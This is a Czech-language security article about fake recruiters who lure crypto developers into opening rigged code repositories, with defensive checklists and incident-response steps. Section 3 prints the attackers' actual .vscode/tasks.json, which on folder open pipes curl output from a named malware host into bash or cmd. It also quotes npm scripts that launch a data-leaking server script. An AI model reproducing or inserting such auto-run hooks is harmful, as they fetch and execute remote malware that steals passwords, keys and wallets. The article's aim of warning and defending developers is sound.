Nakažlivý Pohovor: Jak falešní náboráři hackují vývojáře

Shrnutí: Nová vlna státem sponzorovaných útoků zasahuje nejlepší vývojáře v kryptu. Podvodníci se vydávají za náboráře nebo CTO a nutí kandidáty otevřít škodlivý kód. Tento článek rozebírá případ "Martin Erazo", exploit VS Code "tasks.json" a nezbytný "Protokol Spálení" pro přežití.

Zřeknutí se odpovědnosti: Tento článek cituje incidenty kybernetické bezpečnosti, kde dochází k vydávání se za skutečné osoby. Jména "Martin Erazo" a "Ara Vartanian" odkazují na osoby používané útočníky. Věříme, že skutečné osoby za těmito jmény jsou nevinnými oběťmi krádeže identity.

---

---

1. Perfektní Oběť: Persona "Martin Erazo"

Začíná to zprávou, která stiskne všechna správná tlačítka u Senior Dev:

• Role: CTO / Lead Architect
• Rozpočet: Zajištěné financování $6M
• Tech: Web3, AI, Decentralizovaná Infrastruktura

V nedávno potvrzeném útoku kontaktoval náborář jménem "Martin Erazo" přes LinkedIn. Profil používal jméno a obrázek skutečného divadelního režiséra, ale pracovní historie byla falešná a v roce 2025 se náhle změnila na "IT Project Management" - klasický znak napadeného nebo koupeného účtu.

Podvod se hýbe rychle. Přeskočí typický HR screening a jdou rovnou na "Technický Pohovor" se seniorním vedoucím - v tomto případě imitací skutečného oborového CTO Ara Vartanian (nyní v Limit Break).

Červená Vlajka: Jména projektů se neustále mění. Náborář prodává "Betfin" (platforma GameFi), ale zaslaná prezentace je pro "SpaceXView" (projekt Metaverse). Tato nekonzistence je stopou, že podvodníci recyklují aktiva mezi kampaněmi.

2. Past: "Můžete zkontrolovat náš MVP kód?"

Falešný "CTO" tvrdí, že potřebují vaše zkušené oči, aby zkontrolovaly kód MVP (Minimum Viable Product). Pošlou odkaz na GitHub Repo nebo ZIP soubor a tlačí na vás, abyste jej otevřeli během pohovoru nebo hned po něm.

Zde se děje hack.

Zneužívají vaší ochoty pomoci a vašeho ega. Myslíte si, že hledáte chybu v komponentě React. Ve skutečnosti je ta "chyba" "funkce" navržená tak, aby ukradla vaše úspory.

3. Technický Průnik: Zero-Click Malware

Útočníci používají exploity "zero-click" nebo "low-click", které cílí na vývojářské nástroje. Nemusíte aplikaci spouštět; stačí jen otevřít složku.

Zbraň: .vscode/tasks.json

V tomto konkrétním případě Repo obsahovalo infikovaný .vscode/tasks.json. Tento soubor říká VS Code, jak sestavit projekt.

Škodlivý Kód:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": To je spouštěč. Jakmile otevřete složku ve VS Code, tato úloha se spustí automaticky.
• Payload: Používá curl ke stažení skriptu z vscodesettingtask.vercel.app - známý hostitel malwaru maskovaný jako API nastavení.
• Výsledek: Skript běží v paměti a okamžitě krade hesla Chrome, soubory cookie relace a klíče SSH.

Plán B: package.json scripts

Pokud hacknutí VS Code selže, mají npm skripty:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Spuštění npm install nebo npm start aktivuje server/server.js - lokální C2 (Command and Control) skript, který uniká Proměnné Prostředí (klíče AWS, seedy peněženek) útočníkovi.

4. Červené Vlajky vs Zelené Vlajky

Jak to odhalit dříve, než bude pozdě?

Pokud jste vývojář, "Soukromá Repos" nebo soubory ZIP by měly spustit alarmy nejvyšší úrovně. Legitimní společnosti používají Veřejná Repos nebo standardizované testovací platformy.

Varování: Toto není jediný způsob útoku na vývojáře. Přečtěte si o Pasti Spolupracovníka na Discordu a jak Útoky na Dodavatelský Řetězec činí závislosti nebezpečnými.

5. Bezpečnostní Protokol: Jak dělat pohovor bezpečně

Pokud jste Senior Dev, půjdou po vás. Zocelení vašeho prostředí je povinné.

Protokol 1: Prostředí "Burner"

Nikdy nepoužívejte svou hlavní pracovní stanici pro testování kódu.

• Virtuální Stroje: Použijte VirtualBox nebo VMWare.
• Cloud Dev Environments: Použijte GitHub Codespaces nebo Gitpod. Ty jsou krátkodobé a izolované od vašich lokálních souborů peněženky.

Protokol 2: Forenzní Kontrola

Před otevřením neznámého kódu:

1. Zkontrolujte .vscode/tasks.json: Hledejte runOn: folderOpen.
2. Zkontrolujte package.json: Hledejte podezřelé preinstall nebo postinstall skripty.
3. Klíčová slova: grep pro curl, wget, os.homedir(), .ssh, wallet.

Protokol 3: Zocelení VS Code

Zakažte "Důvěru Pracovního Prostoru" globálně.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
• To nutí VS Code žádat o povolení před spuštěním úloh na úrovni složky.

6. Řešení: "Protokol Spálení" (Burn Protocol)

Pokud jste otevřeli škodlivé Repo (jako to zaslané personou "Martin Erazo"), předpokládejte, že jste kompromitováni. Reset nestačí.

1. Odpojit: Vytáhněte síťový kabel okamžitě.
2. Spálit Peněženky: Vaše Soukromé Klíče unikly. Vytvořte nové peněženky na čistém zařízení (telefon) a přesuňte zbývající prostředky. Nikdy znovu nepoužívejte starý seed.
3. Zabít Relace: Odhlaste se ze všech relací na Google, GitHub, AWS. Aktivně zrušte tokeny.
4. Kontrola Klíče SSH: Zkontrolujte nastavení GitHub/GitLab. Útočníci často přidávají své klíče SSH, aby si udrželi přístup zadními vrátky. Smažte vše, co nepoznáváte.
5. Nuke It: Vymažte disk a přeinstalujte OS. Je to jediný způsob, jak si být 100% jistý, že Rootkity jsou pryč.

Závěr

Podvod "Nakažlivý Pohovor" používá vaši vlastní odbornost proti vám. Cílí na vaši touhu řešit problémy. Ale ve Web3 je paranoia profesní ctností. Ověřujte každou identitu, izolujte každé repo a nikdy nevěřte "náboráři", který spěchá, abyste spustili kód.